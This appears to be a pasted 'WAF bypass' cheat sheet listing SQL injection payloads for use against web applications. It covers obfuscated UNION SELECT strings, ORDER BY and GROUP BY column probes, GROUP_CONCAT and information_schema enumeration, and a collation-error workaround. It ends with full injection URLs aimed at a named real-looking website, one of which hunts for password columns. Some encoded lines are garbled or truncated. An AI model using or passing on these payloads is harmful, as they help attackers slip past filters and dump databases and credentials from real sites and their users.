blackhat1337

sal

Mar 27th, 2024
  1. Cheat Sheet for Bypassing All WAFs
  2.  
  3.  
  4.  
  5. UNION SELECT Cheat Sheet:
  6. This is the list of UNION SELECT bypasses:
  7. ----------------------------------------------------------------------------------------------------------------
  8.  
  9. +union+distinct+select+
  10.  
  11. +union+distinctROW+select+
  12.  
  13. /**//*!12345UNION SELECT*//**/
  14.  
  15. /**//*!50000UNION SELECT*//**/
  16.  
  17. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  18.  
  19. +/*!u%6eion*/+/*!se%6cect*/+
  20.  
  21. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  22.  
  23. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  24.  
  25. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  26.  
  27. union /*!50000%53elect*/
  28.  
  29. %55nion %53elect
  30.  
  31. +--+Union+--+Select+--+
  32.  
  33. +UnIoN/*&a=*/SeLeCT/*&a=*/
  34.  
  35. id=1+?UnI?On?+'SeL?ECT?
  36.  
  37. id=1+'UnI'||'on'+SeLeCT'
  38.  
  39. UnIoN SeLeCt CoNcAt(version())--
  40.  
  41. uNiOn aLl sElEcT
  42.  
  43. uUNIONnion all sSELECTelect
  44.  
  45. /*union*/union/*select*/select+1,2,3/*
  46.  
  47. /*uniXon*/union/*selXect*/select+1,2/*
  48.  
  49. un/**/ion+sel/**/ect
  50.  
  51. +#1q%0Aunion all#qa%0A#%0Aselect
  52.  
  53. union /*!select*/+
  54.  
  55. union/**/select/**/
  56.  
  57. /**/union/**/select/**/
  58.  
  59. /**/union/*!50000select*/
  60.  
  61. /**//*!12345UNION SELECT*//**/
  62.  
  63. /**//*!50000UNION SELECT*//**/
  64.  
  65. /**/uniUNIONon/**/selSELECTect/**/
  66.  
  67. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  68.  
  69. /**//*!union*//**//*!select*//**/
  70.  
  71. /**/UNunionION/**/SELselectECT/**/
  72.  
  73. /**//*UnIOn*//**//*SEleCt*//**/
  74.  
  75. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  76.  
  77. /**/UNunionION/**/all/**/SELselectECT/**/
  78.  
  79. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  80.  
  81. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  82.  
  83. uni
  84.  
  85. %20union%20/*!select*/%20
  86.  
  87. union%23aa%0Aselect
  88.  
  89. union+distinct+select+
  90.  
  91. union+distinctROW+select+
  92.  
  93. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  94.  
  95. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  96.  
  97. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  98.  
  99. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  100.  
  101. /*!u%6eion*/+/*!se%6cect*/+
  102.  
  103. 1%?)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  104.  
  105. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  106.  
  107. union /*!50000%53elect*/
  108.  
  109. +%2F**/+Union/*!select*/
  110.  
  111. %55nion %53elect
  112.  
  113. +?+Union+?+Select+?+
  114.  
  115. +UnIoN/*&a=*/SeLeCT/*&a=*/
  116.  
  117. uNiOn aLl sElEcT
  118.  
  119. uUNIONnion all sSELECTelect
  120.  
  121. union(select(1),2,3)
  122.  
  123. union (select 1111,2222,3333)
  124.  
  125. union (/*!/**/ SeleCT */ 11)
  126.  
  127. %0A%09UNION%0CSELECT%10NULL%
  128.  
  129. /*!union*//*?*//*!all*//*?*//*!select*/
  130.  
  131. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  132.  
  133. union+sel%0bect
  134.  
  135. +uni*on+sel*ect+
  136.  
  137. +#1q%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  138.  
  139. union(select (1),(2),(3),(4),(5))
  140.  
  141. UNION(SELECT(column)FROM(table))
  142.  
  143. id=1+?UnI?On?+?SeL?ECT?
  144.  
  145. id=1+?UnI?||?on?+SeLeCT?
  146.  
  147. union select 1?+%0A,2?+%0A,3?+%0A etc ?
  148.  
  149. /*!00000Union*/ /*!00000Select*/
  150.  
  151. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  152.  
  153. %55nion %53elect
  154.  
  155. %55nion(%53elect 1,2,3)-- -
  156.  
  157. +union+distinct+select+
  158.  
  159. +union+distinctROW+select+
  160.  
  161. /**//*!12345UNION SELECT*//**/
  162.  
  163. /**//*!50000UNION SELECT*//**/
  164.  
  165. /**/UNION/**//*!50000SELECT*//**/
  166.  
  167. /*!50000UniON SeLeCt*/
  168.  
  169. union /*!50000%53elect*/
  170.  
  171. + #?uNiOn + #?sEleCt
  172.  
  173. + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
  174.  
  175. /*!%55NiOn*/ /*!%53eLEct*/
  176.  
  177. /*!u%6eion*/ /*!se%6cect*/
  178.  
  179. +un/**/ion+se/**/lect
  180.  
  181. uni%0bon+se%0blect
  182.  
  183. %2f**%2funion%2f**%2fselect
  184.  
  185. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  186.  
  187. REVERSE(noinu)+REVERSE(tceles)
  188.  
  189. /*--*/union/*--*/select/*--*/
  190.  
  191. union (/*!/**/ SeleCT */ 1,2,3)
  192.  
  193. /*!union*/+/*!select*/
  194.  
  195. union+/*!select*/
  196.  
  197. /**/union/**/select/**/
  198.  
  199. /**/uNIon/**/sEleCt/**/
  200.  
  201. +%2F**/+Union/*!select*/
  202.  
  203. /**//*!union*//**//*!select*//**/
  204.  
  205. /*!uNIOn*/ /*!SelECt*/
  206.  
  207. +union+distinct+select+
  208.  
  209. +union+distinctROW+select+
  210.  
  211. uNiOn aLl sElEcT
  212.  
  213. UNIunionON+SELselectECT
  214.  
  215. /**/union/*!50000select*//**/
  216.  
  217. 0%a0union%a0select%09
  218.  
  219. %0Aunion%0Aselect%0A
  220.  
  221. %55nion/**/%53elect
  222.  
  223. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  224.  
  225. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  226.  
  227. %0A%09UNION%0CSELECT%10NULL%
  228.  
  229. /*!union*//*--*//*!all*//*--*//*!select*/
  230.  
  231. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  232.  
  233. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  234.  
  235. +UnIoN/*&a=*/SeLeCT/*&a=*/
  236.  
  237. union+sel%0bect
  238.  
  239. +uni*on+sel*ect+
  240.  
  241. +#1q%0Aunion all#qa%0A#%0Aselect
  242.  
  243. union(select (1),(2),(3),(4),(5))
  244.  
  245. UNION(SELECT(column)FROM(table))
  246.  
  247. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  248.  
  249. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  250.  
  251. union(select(1),2,3)
  252.  
  253. union (select 1111,2222,3333)
  254.  
  255. uNioN (/*!/**/ SeleCT */ 11)
  256.  
  257. union (select 1111,2222,3333)
  258.  
  259. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  260.  
  261. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  262.  
  263. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  264.  
  265. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  266.  
  267. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  268.  
  269. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  270.  
  271. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  272.  
  273. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  274.  
  275. /union\sselect/g
  276.  
  277. /union\s+select/i
  278.  
  279. /*!UnIoN*/SeLeCT
  280.  
  281. +UnIoN/*&a=*/SeLeCT/*&a=*/
  282.  
  283. +uni>on+sel>ect+
  284.  
  285. +(UnIoN)+(SelECT)+
  286.  
  287. +(UnI)(oN)+(SeL)(EcT)
  288.  
  289. +?UnI?On?+'SeL?ECT?
  290.  
  291. +uni on+sel ect+
  292.  
  293. +/*!UnIoN*/+/*!SeLeCt*/+
  294.  
  295. /*!u%6eion*/ /*!se%6cect*/
  296.  
  297. uni%20union%20/*!select*/%20
  298.  
  299. union%23aa%0Aselect
  300.  
  301. /**/union/*!50000select*/
  302.  
  303. /^.*union.*$/ /^.*select.*$/
  304.  
  305. /*union*/union/*select*/select+
  306.  
  307. /*uni X on*/union/*sel X ect*/
  308.  
  309. +un/**/ion+sel/**/ect+
  310.  
  311. +UnIOn%0d%0aSeleCt%0d%0a
  312.  
  313. UNION/*&test=1*/SELECT/*&pwn=2*/
  314.  
  315. un?+un/**/ion+se/**/lect+
  316.  
  317. +UNunionION+SEselectLECT+
  318.  
  319. +uni%0bon+se%0blect+
  320.  
  321. %252f%252a*/union%252f%252a /select%252f%252a*/
  322.  
  323. /%2A%2A/union/%2A%2A/select/%2A%2A/
  324.  
  325. %2f**%2funion%2f**%2fselect%2f**%2f
  326.  
  327. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  328.  
  329. /*!UnIoN*/SeLecT+
  330.  
  331. -----------------------------------------------------------------------------------------------------------------------
  332.  
  333. UNION SELECT bypass using the URL-encoded method:
  334.  
  335. -----------------------------------------------------------------------------------------------------------------------
  336.  
  337. %55nion(%53elect)
  338.  
  339. union%20distinct%20select
  340.  
  341. union%20%64istinctRO%57%20select
  342.  
  343. union%2053elect
  344.  
  345. %23?%0auion%20?%23?%0aselect
  346.  
  347. %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect
  348.  
  349. %55nion %53eLEct
  350.  
  351. u%6eion se%6cect
  352.  
  353. unio%6e %73elect
  354.  
  355. unio%6e%20%64istinc%74%20%73elect
  356.  
  357. uni%6fn distinct%52OW s%65lect
  358.  
  359. %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%7
  360.  
  361.  
  362. ---------------------------------------------------------------------------------------------------------------------
  363.  
  364. Cheat Sheet for Bypassing ORDER BY and GROUP BY
  365. ---------------------------------------------------------------------------------------------------------------------
  366.  
  367. order by/**_**/
  368.  
  369. /*!12345order*/ /*!12345by*/
  370.  
  371. ) order by 1-- -
  372.  
  373. ') order by 1-- -
  374.  
  375.  
  376. ')order by 1%23%23
  377.  
  378.  
  379. %')order by 1%23%23
  380.  
  381.  
  382. Null' order by 100--+
  383.  
  384.  
  385. Null' order by 9999--+
  386.  
  387.  
  388. ')group by 99-- -
  389.  
  390.  
  391. 'group by 119449-- -
  392.  
  393.  
  394. 'group/**/by/**/99%23%23
  395.  
  396. ------------------------------------------------------------------------------------------------------------------------
       CONCAT and GROUP_CONCAT Bypass Cheat Sheet:
  397.  
  398. ------------------------------------------------------------------------------------------------------------------------
  399.  
  400.  
  401.  
  402. /*!12345group_concat*/(/*!12345table_name*/)
  403.  
  404. /*!50000group_concat*/(/*!50000table_name*/)
  405.  
  406. /*!GrOuP_ConCaT*/()
  407.  
  408. /*!12345GroUP_ConCat*/()
  409.  
  410. /*!50000gRouP_cOnCaT*/()
  411.  
  412. /*!50000Gr%6fuP_c%6fnCAT*/()
  413.  
  414. /*!group_concat*/()
  415.  
  416. gRoUp_cOnCAt()
  417.  
  418. group_concat(/*!*/)
  419.  
  420. group_concat(/*!12345table_name*/)
  421.  
  422. group_concat(/*!50000table_name*/)
  423.  
  424. /*!group_concat*/(/*!12345table_name*/)
  425.  
  426. /*!group_concat*/(/*!50000table_name*/)
  427.  
  428. unhex(hex(group_concat(table_name)))
  429.  
  430. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  431.  
  432. unhex(hex(/*!12345group_concat*/(table_name)))
  433.  
  434. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  435.  
  436. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  437.  
  438. unhex(hex(/*!50000group_concat*/(table_name)))
  439.  
  440. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  441.  
  442. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  443.  
  444. CONVERT(group_concat(table_name)+USING+latin1)
  445.  
  446. CONVERT(group_concat(table_name)+USING+latin2)
  447.  
  448. CONVERT(group_concat(table_name)+USING+latin3)
  449.  
  450. CONVERT(group_concat(table_name)+USING+latin4)
  451.  
  452. CONVERT(group_concat(table_name)+USING+latin5)
  453.  
  454. convert(group_concat(table_name)+using+ascii)
  455.  
  456. convert(group_concat(/*!table_name*/)+using+ascii)
  457.  
  458. convert(group_concat(/*!12345table_name*/)+using+ascii)
  459.  
  460. convert(group_concat(/*!50000table_name*/)+using+ascii)
  461.  
  462. /*!concat_ws(0x3a,)*/
  463.  
  464. concat_ws(0x3a3a3a,version()
  465.  
  466. CONCAT_WS(CHAR(32,58,32),version(),)
  467.  
  468. ----------------------------------------------------------------------------------------------------------------
  469.  
  470. How to Bypass Tables:
  471.  
  472. ---------------------------------------------------------------------------------------------------------------
  473.  
  474. group_concat(/*!table_name*/)
  475.  
  476.  
  477. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES? -
  478.  
  479.  
  480. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*//*!TaBle_ScHEmA*/=schEMA()?
  481.  
  482. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()? -
  483.  
  484. ===========================================================
  485.  
  486. How to Bypass Columns:
  487.  
  488. ===========================================================
  489.  
  490. group_concat(/*!column_name*/)
  491.  
  492. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  493.  
  494. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!froM*/ table? -
  495.  
  496.  
  497.  
  498. ========================================================================
  499.  
  500. URL-encoded bypasses for tables and columns:
  501.  
  502. ===========================================================
  503.  
  504.  
  505. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  506. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  507. For example:
  508. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 ?
  509.  
  510.  
  511. ========================================================================
  512.  
  513. "Illegal mix of collations" error bypass:
  514.  
  515. ========================================================================
  516.  
  517. Bypass method:
  518.  
  519.  
  520. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  521. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  522.  
  523.  
  524. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)?